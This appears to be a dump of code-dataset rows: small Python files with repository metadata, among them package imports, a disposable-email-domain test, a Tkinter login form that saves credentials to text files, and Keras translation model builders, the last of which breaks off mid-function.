] | null | null | null | dms/v2/student/__init__.py | moreal/DMS-api | 9624e28764ec4535002677671e10a09d762d19a8 | [
"MIT"
] | null | null | null | dms/v2/student/__init__.py | moreal/DMS-api | 9624e28764ec4535002677671e10a09d762d19a8 | [
"MIT"
] | 1 | 2018-09-29T14:35:20.000Z | 2018-09-29T14:35:20.000Z | from dms.v2.student.account import Account
| 21.5 | 42 | 0.837209 | 7 | 43 | 5.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.093023 | 43 | 1 | 43 | 43 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4dfc3dc96e8b575391914a9cd2042107dcb89915 | 86 | py | Python | tests/data/moredumplingchefs/moretestchefone.py | mjoblin/netdumplings | 1ec3c4d80f302fe749e51171084ac05bbe57a701 | [
"MIT"
] | 2 | 2016-06-02T18:13:38.000Z | 2020-03-05T08:41:10.000Z | tests/data/moredumplingchefs/moretestchefone.py | mjoblin/netdumplings | 1ec3c4d80f302fe749e51171084ac05bbe57a701 | [
"MIT"
] | 5 | 2016-11-25T02:35:51.000Z | 2018-01-13T05:53:06.000Z | tests/data/moredumplingchefs/moretestchefone.py | mjoblin/netdumplings | 1ec3c4d80f302fe749e51171084ac05bbe57a701 | [
"MIT"
] | null | null | null | from netdumplings import DumplingChef
class MoreTestChefOne(DumplingChef):
pass
| 14.333333 | 37 | 0.813953 | 8 | 86 | 8.75 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151163 | 86 | 5 | 38 | 17.2 | 0.958904 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
1501414f28d30eca589e590f6fa305c57d2fd300 | 201 | py | Python | tests/test_blacklist.py | lodow/disposable-email-domains | f56dc339d1df0d86e465a6e140030efe82f30aa3 | [
"MIT"
] | null | null | null | tests/test_blacklist.py | lodow/disposable-email-domains | f56dc339d1df0d86e465a6e140030efe82f30aa3 | [
"MIT"
] | null | null | null | tests/test_blacklist.py | lodow/disposable-email-domains | f56dc339d1df0d86e465a6e140030efe82f30aa3 | [
"MIT"
] | null | null | null | from disposable_email_domains import blacklist
def test_blacklist_inclusion():
assert 'spamcowboy.com' in blacklist
def test_blacklist_exclusion():
assert 'spamcannon.com' not in blacklist
| 20.1 | 46 | 0.79602 | 25 | 201 | 6.16 | 0.64 | 0.155844 | 0.207792 | 0.324675 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144279 | 201 | 9 | 47 | 22.333333 | 0.895349 | 0 | 0 | 0 | 0 | 0 | 0.139303 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.4 | true | 0 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
150db2cfc6ebd4d370d9ac87f3edfa6983804363 | 271 | py | Python | src/dlkp/extraction/__init__.py | midas-research/dlkp | 5f47a780a6b05a71f799287d8ad612542a897047 | [
"MIT"
] | 2 | 2022-03-12T15:08:55.000Z | 2022-03-14T09:11:43.000Z | src/dlkp/extraction/__init__.py | midas-research/dlkp | 5f47a780a6b05a71f799287d8ad612542a897047 | [
"MIT"
] | 14 | 2022-02-19T07:42:09.000Z | 2022-03-20T21:43:42.000Z | src/dlkp/extraction/__init__.py | midas-research/dlkp | 5f47a780a6b05a71f799287d8ad612542a897047 | [
"MIT"
] | null | null | null | from .utils import KEDataArguments, KEModelArguments, KETrainingArguments
from .trainer import KpExtractionTrainer, CrfKpExtractionTrainer
from .data_collators import DataCollatorForKpExtraction
from .models import AutoCrfModelforKpExtraction, AutoModelForKpExtraction
| 38.714286 | 73 | 0.889299 | 21 | 271 | 11.428571 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081181 | 271 | 6 | 74 | 45.166667 | 0.963855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
12844120d036e1707d331b46871d56ab95c8472b | 166 | py | Python | djangoprovider/__init__.py | MPASolutions/django-provider | c305c79dcea381d04463384dc7ae8ad415152916 | [
"MIT"
] | 2 | 2018-10-25T08:56:39.000Z | 2018-10-27T18:47:10.000Z | djangoprovider/__init__.py | MPASolutions/django-provider | c305c79dcea381d04463384dc7ae8ad415152916 | [
"MIT"
] | null | null | null | djangoprovider/__init__.py | MPASolutions/django-provider | c305c79dcea381d04463384dc7ae8ad415152916 | [
"MIT"
] | null | null | null | from djangoprovider.provider import DjangoProvider
from djangoprovider.utils import register_django_provider
__all__ = ['DjangoProvider', 'register_django_provider'] | 41.5 | 57 | 0.86747 | 17 | 166 | 8 | 0.470588 | 0.264706 | 0.323529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072289 | 166 | 4 | 58 | 41.5 | 0.883117 | 0 | 0 | 0 | 0 | 0 | 0.227545 | 0.143713 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1299c87810a59b841cb52a0c5f8c34e2d8690537 | 161 | py | Python | Aulas/aula10.py | Matheus1199/python | c87859d4bf63ba0edea43d864fcbce4915da7e6a | [
"MIT"
] | null | null | null | Aulas/aula10.py | Matheus1199/python | c87859d4bf63ba0edea43d864fcbce4915da7e6a | [
"MIT"
] | null | null | null | Aulas/aula10.py | Matheus1199/python | c87859d4bf63ba0edea43d864fcbce4915da7e6a | [
"MIT"
] | null | null | null | tempo = int(input('Quantos anos tem seu carro? '))
if tempo <= 3:
print('Seu carro está novinho!')
else:
print('Seu carro está velho!')
print('--FIM--')
| 23 | 50 | 0.627329 | 24 | 161 | 4.208333 | 0.666667 | 0.237624 | 0.257426 | 0.336634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007634 | 0.186335 | 161 | 6 | 51 | 26.833333 | 0.763359 | 0 | 0 | 0 | 0 | 0 | 0.490683 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
12b7c8e4ee19083b8d7228b5aad6372f708349ee | 37 | py | Python | JSSEnv/envs/__init__.py | prosysscience/JSSEnv | 2a5bbe07726f3c1088017074f634f31e62aa03b3 | [
"MIT"
] | 43 | 2021-03-09T12:05:05.000Z | 2022-03-28T06:04:17.000Z | JSSEnv/envs/__init__.py | ingambe/JSSEnv | c76a5b4bdf32a8662c6ad18787b849c42855db13 | [
"MIT"
] | 13 | 2021-02-28T19:01:39.000Z | 2021-03-05T11:18:10.000Z | JSSEnv/envs/__init__.py | shaoxiaorui/JSSEnv | 2a5bbe07726f3c1088017074f634f31e62aa03b3 | [
"MIT"
] | 18 | 2021-02-19T14:41:16.000Z | 2022-03-01T09:56:19.000Z | from JSSEnv.envs.JssEnv import JssEnv | 37 | 37 | 0.864865 | 6 | 37 | 5.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 37 | 1 | 37 | 37 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
12bf161ddfa6935c6470556d6fab026edf4a14d7 | 26 | py | Python | lab4/__init__.py | kinpa200296/MM_labs | d56f6939e1669c3c8e9943ffb012a91cd2a7c11c | [
"MIT"
] | null | null | null | lab4/__init__.py | kinpa200296/MM_labs | d56f6939e1669c3c8e9943ffb012a91cd2a7c11c | [
"MIT"
] | null | null | null | lab4/__init__.py | kinpa200296/MM_labs | d56f6939e1669c3c8e9943ffb012a91cd2a7c11c | [
"MIT"
] | null | null | null | from drv import DrvRandom
| 13 | 25 | 0.846154 | 4 | 26 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 1 | 26 | 26 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
12c52728623004b95521a77fa6551fa6fdc7e3bf | 146 | py | Python | src/pyoffice/outlook/windows/dasl/__init__.py | qq809326636/pyoffice | a3c036ef82f6b0438c1e38a7675eb1f06c61144d | [
"MIT"
] | 7 | 2020-06-19T03:11:48.000Z | 2020-11-18T06:14:21.000Z | src/pyoffice/outlook/windows/dasl/__init__.py | qq809326636/pyoffice | a3c036ef82f6b0438c1e38a7675eb1f06c61144d | [
"MIT"
] | null | null | null | src/pyoffice/outlook/windows/dasl/__init__.py | qq809326636/pyoffice | a3c036ef82f6b0438c1e38a7675eb1f06c61144d | [
"MIT"
] | null | null | null | from .constant import *
from .operator import *
from .linker import *
from .Expression import *
from .Group import *
from .Builder import *
| 20.857143 | 26 | 0.712329 | 18 | 146 | 5.777778 | 0.444444 | 0.480769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205479 | 146 | 6 | 27 | 24.333333 | 0.896552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
423e7a35daee513ea51653aa5cade3d195859ce9 | 724 | py | Python | octicons16px/unfold.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | 1 | 2021-01-28T06:47:39.000Z | 2021-01-28T06:47:39.000Z | octicons16px/unfold.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null | octicons16px/unfold.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null |
OCTICON_UNFOLD = """
<svg class="octicon octicon-unfold" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M8.177.677l2.896 2.896a.25.25 0 01-.177.427H8.75v1.25a.75.75 0 01-1.5 0V4H5.104a.25.25 0 01-.177-.427L7.823.677a.25.25 0 01.354 0zM7.25 10.75a.75.75 0 011.5 0V12h2.146a.25.25 0 01.177.427l-2.896 2.896a.25.25 0 01-.354 0l-2.896-2.896A.25.25 0 015.104 12H7.25v-1.25zm-5-2a.75.75 0 000-1.5h-.5a.75.75 0 000 1.5h.5zM6 8a.75.75 0 01-.75.75h-.5a.75.75 0 010-1.5h.5A.75.75 0 016 8zm2.25.75a.75.75 0 000-1.5h-.5a.75.75 0 000 1.5h.5zM12 8a.75.75 0 01-.75.75h-.5a.75.75 0 010-1.5h.5A.75.75 0 0112 8zm2.25.75a.75.75 0 000-1.5h-.5a.75.75 0 000 1.5h.5z"></path></svg>
"""
| 144.8 | 697 | 0.672652 | 193 | 724 | 2.518135 | 0.341969 | 0.115226 | 0.144033 | 0.100823 | 0.49177 | 0.417695 | 0.417695 | 0.325103 | 0.325103 | 0.325103 | 0 | 0.498466 | 0.099448 | 724 | 4 | 698 | 181 | 0.246933 | 0 | 0 | 0 | 0 | 0.333333 | 0.966805 | 0.174274 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
424552100947697c17a326dfd6ca7889b34e40a1 | 13,257 | py | Python | telaLogin.py | torvigoes/Interface-Tkinter | 46b6fd7ffa2226df356f43355ede7b87b886d448 | [
"MIT"
] | null | null | null | telaLogin.py | torvigoes/Interface-Tkinter | 46b6fd7ffa2226df356f43355ede7b87b886d448 | [
"MIT"
] | null | null | null | telaLogin.py | torvigoes/Interface-Tkinter | 46b6fd7ffa2226df356f43355ede7b87b886d448 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# GUI module generated by PAGE version 6.2
# in conjunction with Tcl version 8.6
# Jun 16, 2021 12:26:15 PM -03 platform: Windows NT
import sys
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
class Toplevel1:
def __init__(self):
'''This class configures and populates the toplevel window.
top is the toplevel containing window.'''
_bgcolor = '#d9d9d9' # X11 color: 'gray85'
_fgcolor = '#000000' # X11 color: 'black'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # X11 color: 'gray85'
_ana2color = '#ececec' # Closest X11 color: 'gray92'
self.root = tk.Tk()
self.root.geometry("610x463+387+122")
self.root.minsize(120, 1)
self.root.maxsize(2970, 881)
self.root.resizable(1, 1)
self.root.title("LOGIN")
self.root.configure(background="#8a96ea")
self.menubar = tk.Menu(self.root, font="TkMenuFont", bg=_bgcolor, fg=_fgcolor)
self.root.configure(menu=self.menubar)
self.frameCadastro = tk.Frame(self.root)
self.frameCadastro.place(relx=0.262, rely=0.108, relheight=0.721
, relwidth=0.523)
self.frameCadastro.configure(relief='flat')
self.frameCadastro.configure(borderwidth="2")
self.frameCadastro.configure(background="#9fa9ec")
self.frameCadastro.configure(cursor="fleur")
self.Entry1 = tk.Entry(self.frameCadastro)
self.Entry1.place(relx=0.241, rely=0.35, height=20, relwidth=0.514)
self.Entry1.configure(background="white")
self.Entry1.configure(disabledforeground="#a3a3a3")
self.Entry1.configure(font="TkFixedFont")
self.Entry1.configure(foreground="#000000")
self.Entry1.configure(insertbackground="black")
self.Entry2 = tk.Entry(self.frameCadastro, show='*')
self.Entry2.place(relx=0.251, rely=0.539, height=20, relwidth=0.514)
self.Entry2.configure(background="white")
self.Entry2.configure(disabledforeground="#a3a3a3")
self.Entry2.configure(font="TkFixedFont")
self.Entry2.configure(foreground="#000000")
self.Entry2.configure(insertbackground="black")
self.button1Cadastro = tk.Button(self.frameCadastro)
self.button1Cadastro.place(relx=0.376, rely=0.06, height=44, width=77)
self.button1Cadastro.configure(activebackground="#ececec")
self.button1Cadastro.configure(activeforeground="#000000")
self.button1Cadastro.configure(background="#9fa9ec")
self.button1Cadastro.configure(cursor="fleur")
self.button1Cadastro.configure(disabledforeground="#a3a3a3")
self.button1Cadastro.configure(font="-family {Leelawadee UI Semilight} -size 15 -weight bold -slant italic")
self.button1Cadastro.configure(foreground="#000000")
self.button1Cadastro.configure(highlightbackground="#d9d9d9")
self.button1Cadastro.configure(highlightcolor="black")
self.button1Cadastro.configure(pady="0")
self.button1Cadastro.configure(relief="flat")
self.button1Cadastro.configure(text='''Login''')
self.button1Cadastro_2 = tk.Button(self.frameCadastro)
self.button1Cadastro_2.place(relx=0.219, rely=0.269, height=24, width=67)
self.button1Cadastro_2.configure(activebackground="#ececec")
self.button1Cadastro_2.configure(activeforeground="#000000")
self.button1Cadastro_2.configure(background="#9fa9ec")
self.button1Cadastro_2.configure(disabledforeground="#a3a3a3")
self.button1Cadastro_2.configure(font="-family {Leelawadee UI Semilight} -size 10 -weight bold -slant italic")
self.button1Cadastro_2.configure(foreground="#000000")
self.button1Cadastro_2.configure(highlightbackground="#d9d9d9")
self.button1Cadastro_2.configure(highlightcolor="black")
self.button1Cadastro_2.configure(pady="0")
self.button1Cadastro_2.configure(relief="flat")
self.button1Cadastro_2.configure(text='''User''')
self.button1Cadastro_2_1 = tk.Button(self.frameCadastro)
self.button1Cadastro_2_1.place(relx=0.219, rely=0.449, height=24, width=87)
self.button1Cadastro_2_1.configure(activebackground="#ececec")
self.button1Cadastro_2_1.configure(activeforeground="#000000")
self.button1Cadastro_2_1.configure(background="#9fa9ec")
self.button1Cadastro_2_1.configure(disabledforeground="#a3a3a3")
self.button1Cadastro_2_1.configure(font="-family {Leelawadee UI Semilight} -size 10 -weight bold -slant italic")
self.button1Cadastro_2_1.configure(foreground="#000000")
self.button1Cadastro_2_1.configure(highlightbackground="#d9d9d9")
self.button1Cadastro_2_1.configure(highlightcolor="black")
self.button1Cadastro_2_1.configure(pady="0")
self.button1Cadastro_2_1.configure(relief="flat")
self.button1Cadastro_2_1.configure(text='''Password''')
self.Button2 = tk.Button(self.frameCadastro, command=self.LoginBackEnd)
self.Button2.place(relx=0.345, rely=0.659, height=34, width=97)
self.Button2.configure(activebackground="#ececec")
self.Button2.configure(activeforeground="#000000")
self.Button2.configure(background="#e4c5e4")
self.Button2.configure(disabledforeground="#a3a3a3")
self.Button2.configure(foreground="#000000")
self.Button2.configure(highlightbackground="#d9d9d9")
self.Button2.configure(highlightcolor="black")
self.Button2.configure(pady="0")
self.Button2.configure(text='''Sign in''')
self.Button2_1 = tk.Button(self.frameCadastro, command=self.Cadastro)
self.Button2_1.place(relx=0.345, rely=0.778, height=34, width=97)
self.Button2_1.configure(activebackground="#ececec")
self.Button2_1.configure(activeforeground="#000000")
self.Button2_1.configure(background="#e4c5e4")
self.Button2_1.configure(disabledforeground="#a3a3a3")
self.Button2_1.configure(foreground="#000000")
self.Button2_1.configure(highlightbackground="#d9d9d9")
self.Button2_1.configure(highlightcolor="black")
self.Button2_1.configure(pady="0")
self.Button2_1.configure(text='''Register''')
self.root.mainloop()
def Cadastro(self):
root = tk.Tk()
root.title('Usuário logado')
_bgcolor = '#d9d9d9' # X11 color: 'gray85'
_fgcolor = '#000000' # X11 color: 'black'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # X11 color: 'gray85'
_ana2color = '#ececec' # Closest X11 color: 'gray92'
self.root = tk.Tk()
self.root.geometry("610x463+387+122")
self.root.minsize(120, 1)
self.root.maxsize(2970, 881)
self.root.resizable(1, 1)
self.root.title("Register")
self.root.configure(background="#8a96ea")
self.menubar = tk.Menu(self.root, font="TkMenuFont", bg=_bgcolor, fg=_fgcolor)
self.root.configure(menu=self.menubar)
self.frameCadastro = tk.Frame(self.root)
self.frameCadastro.place(relx=0.262, rely=0.108, relheight=0.721
, relwidth=0.523)
self.frameCadastro.configure(relief='flat')
self.frameCadastro.configure(borderwidth="2")
self.frameCadastro.configure(background="#9fa9ec")
self.frameCadastro.configure(cursor="fleur")
self.entry1Cadastro = tk.Entry(self.frameCadastro)
self.entry1Cadastro.place(relx=0.241, rely=0.35, height=20, relwidth=0.514)
self.entry1Cadastro.configure(background="white")
self.entry1Cadastro.configure(disabledforeground="#a3a3a3")
self.entry1Cadastro.configure(font="TkFixedFont")
self.entry1Cadastro.configure(foreground="#000000")
self.entry1Cadastro.configure(insertbackground="black")
self.entry2Cadastro = tk.Entry(self.frameCadastro, show='*')
self.entry2Cadastro.place(relx=0.241, rely=0.539, height=20, relwidth=0.514)
self.entry2Cadastro.configure(background="white")
self.entry2Cadastro.configure(disabledforeground="#a3a3a3")
self.entry2Cadastro.configure(font="TkFixedFont")
self.entry2Cadastro.configure(foreground="#000000")
self.entry2Cadastro.configure(insertbackground="black")
self.button1Cadastro = tk.Button(self.frameCadastro)
self.button1Cadastro.place(relx=0.376, rely=0.06, height=44, width=80)
self.button1Cadastro.configure(activebackground="#ececec")
self.button1Cadastro.configure(activeforeground="#000000")
self.button1Cadastro.configure(background="#9fa9ec")
self.button1Cadastro.configure(cursor="fleur")
self.button1Cadastro.configure(disabledforeground="#a3a3a3")
self.button1Cadastro.configure(font="-family {Leelawadee UI Semilight} -size 15 -weight bold -slant italic")
self.button1Cadastro.configure(foreground="#000000")
self.button1Cadastro.configure(highlightbackground="#d9d9d9")
self.button1Cadastro.configure(highlightcolor="black")
self.button1Cadastro.configure(pady="0")
self.button1Cadastro.configure(relief="flat")
self.button1Cadastro.configure(text='Register')
self.button1Cadastro_2 = tk.Button(self.frameCadastro)
self.button1Cadastro_2.place(relx=0.219, rely=0.269, height=24, width=67)
self.button1Cadastro_2.configure(activebackground="#ececec")
self.button1Cadastro_2.configure(activeforeground="#000000")
self.button1Cadastro_2.configure(background="#9fa9ec")
self.button1Cadastro_2.configure(disabledforeground="#a3a3a3")
self.button1Cadastro_2.configure(font="-family {Leelawadee UI Semilight} -size 10 -weight bold -slant italic")
self.button1Cadastro_2.configure(foreground="#000000")
self.button1Cadastro_2.configure(highlightbackground="#d9d9d9")
self.button1Cadastro_2.configure(highlightcolor="black")
self.button1Cadastro_2.configure(pady="0")
self.button1Cadastro_2.configure(relief="flat")
self.button1Cadastro_2.configure(text='''User''')
self.button1Cadastro_2_1 = tk.Button(self.frameCadastro)
self.button1Cadastro_2_1.place(relx=0.219, rely=0.449, height=24, width=87)
self.button1Cadastro_2_1.configure(activebackground="#ececec")
self.button1Cadastro_2_1.configure(activeforeground="#000000")
self.button1Cadastro_2_1.configure(background="#9fa9ec")
self.button1Cadastro_2_1.configure(disabledforeground="#a3a3a3")
self.button1Cadastro_2_1.configure(font="-family {Leelawadee UI Semilight} -size 10 -weight bold -slant italic")
self.button1Cadastro_2_1.configure(foreground="#000000")
self.button1Cadastro_2_1.configure(highlightbackground="#d9d9d9")
self.button1Cadastro_2_1.configure(highlightcolor="black")
self.button1Cadastro_2_1.configure(pady="0")
self.button1Cadastro_2_1.configure(relief="flat")
self.button1Cadastro_2_1.configure(text='''Password''')
self.Button2_1 = tk.Button(self.frameCadastro, command=self.CadastrarBackEnd)
self.Button2_1.place(relx=0.345, rely=0.778, height=34, width=97)
self.Button2_1.configure(activebackground="#ececec")
self.Button2_1.configure(activeforeground="#000000")
self.Button2_1.configure(background="#e4c5e4")
self.Button2_1.configure(disabledforeground="#a3a3a3")
self.Button2_1.configure(foreground="#000000")
self.Button2_1.configure(highlightbackground="#d9d9d9")
self.Button2_1.configure(highlightcolor="black")
self.Button2_1.configure(pady="0")
self.Button2_1.configure(text='''Register''')
self.root.mainloop()
def CadastrarBackEnd(self):
try:
with open('users.txt', 'a') as arquivoUsers:
arquivoUsers.write(self.entry1Cadastro.get() + '\n')
with open('passwords.txt', 'a') as arquivoPasswords:
arquivoPasswords.write(self.entry2Cadastro.get() + '\n')
self.root.destroy()
except:
print('Houve um erro!')
def LoginBackEnd(self):
with open('users.txt', 'r') as arquivoUsers:
usuarios = arquivoUsers.readlines()
with open('passwords.txt', 'r') as arquivoPasswords:
senhas = arquivoPasswords.readlines()
usuarios = list(map(lambda x: x.replace('\n', ''), usuarios))
senhas = list(map(lambda x: x.replace('\n', ''), senhas))
usuario = self.Entry1.get()
senha = self.Entry2.get()
logado = False
for i in range(len(usuarios)):
if usuario == usuarios[i] and senha == senhas[i]:
print('Login feito com sucesso!')
self.root.destroy()
logado = True
if not logado:
print('Usuário ou senha incorretos!')
self.root.destroy()
Toplevel1()
| 48.032609 | 120 | 0.679188 | 1,450 | 13,257 | 6.128276 | 0.148966 | 0.171056 | 0.117038 | 0.061445 | 0.780216 | 0.73914 | 0.721472 | 0.716295 | 0.716295 | 0.699527 | 0 | 0.077475 | 0.189937 | 13,257 | 275 | 121 | 48.207273 | 0.749977 | 0.03666 | 0 | 0.637555 | 1 | 0 | 0.10982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017467 | false | 0.026201 | 0.030568 | 0 | 0.052402 | 0.0131 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
425b2767322c83993299373f579a5afed2daa85e | 6,075 | py | Python | models.py | hamidali0391/Machine-Translation | 0e2b8299a2aa5baa02da6d9262a90640c98a9770 | [
"MIT"
] | null | null | null | models.py | hamidali0391/Machine-Translation | 0e2b8299a2aa5baa02da6d9262a90640c98a9770 | [
"MIT"
] | null | null | null | models.py | hamidali0391/Machine-Translation | 0e2b8299a2aa5baa02da6d9262a90640c98a9770 | [
"MIT"
] | null | null | null | import collections
import helper
import numpy as np
import project_tests as tests
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.models import Model
from keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional
from keras.layers.embeddings import Embedding
from keras.optimizers import Adam
from keras.losses import sparse_categorical_crossentropy
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
from keras.layers import SimpleRNN
from keras.models import Sequential
from keras.layers import InputLayer
from keras.layers import LSTM
def simple_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
"""
Build and train a basic RNN on x and y
:param input_shape: Tuple of input shape
:param output_sequence_length: Length of output sequence
:param english_vocab_size: Number of unique English words in the dataset
:param french_vocab_size: Number of unique French words in the dataset
:return: Keras model built, but not trained
"""
# TODO: Build the layers
input_layer=InputLayer(input_shape[1:])
rnn=GRU(64,return_sequences=True)
logits=TimeDistributed(Dense(french_vocab_size,activation='softmax'))
# TODO: Implement
learning_rate=1e-3
model=Sequential()
model.add(input_layer)
model.add(rnn)
model.add(logits)
model.compile(loss=sparse_categorical_crossentropy,
optimizer=Adam(learning_rate),
metrics=['accuracy'])
return model
def embed_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
"""
Build and train a RNN model using word embedding on x and y
:param input_shape: Tuple of input shape
:param output_sequence_length: Length of output sequence
:param english_vocab_size: Number of unique English words in the dataset
:param french_vocab_size: Number of unique French words in the dataset
:return: Keras model built, but not trained
"""
#model_input=Input(input_shape[1:])
embed_layer=Embedding(french_vocab_size,64,input_length=input_shape[1])
rnn=GRU(64,return_sequences=True)
logits=TimeDistributed(Dense(french_vocab_size,activation='softmax'))
# TODO: Implement
learning_rate=1e-3
model=Sequential()
model.add(embed_layer)
model.add(rnn)
model.add(logits)
model.compile(loss=sparse_categorical_crossentropy,
optimizer=Adam(learning_rate),
metrics=['accuracy'])
return model
def bd_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
"""
Build and train a bidirectional RNN model on x and y
:param input_shape: Tuple of input shape
:param output_sequence_length: Length of output sequence
:param english_vocab_size: Number of unique English words in the dataset
:param french_vocab_size: Number of unique French words in the dataset
:return: Keras model built, but not trained
"""
# TODO: Build the layers
input_layer=InputLayer(input_shape[1:])
rnn=Bidirectional(GRU(64,return_sequences=True))
logits=TimeDistributed(Dense(french_vocab_size,activation='softmax'))
# TODO: Implement
learning_rate=1e-3
model=Sequential()
model.add(input_layer)
model.add(rnn)
model.add(logits)
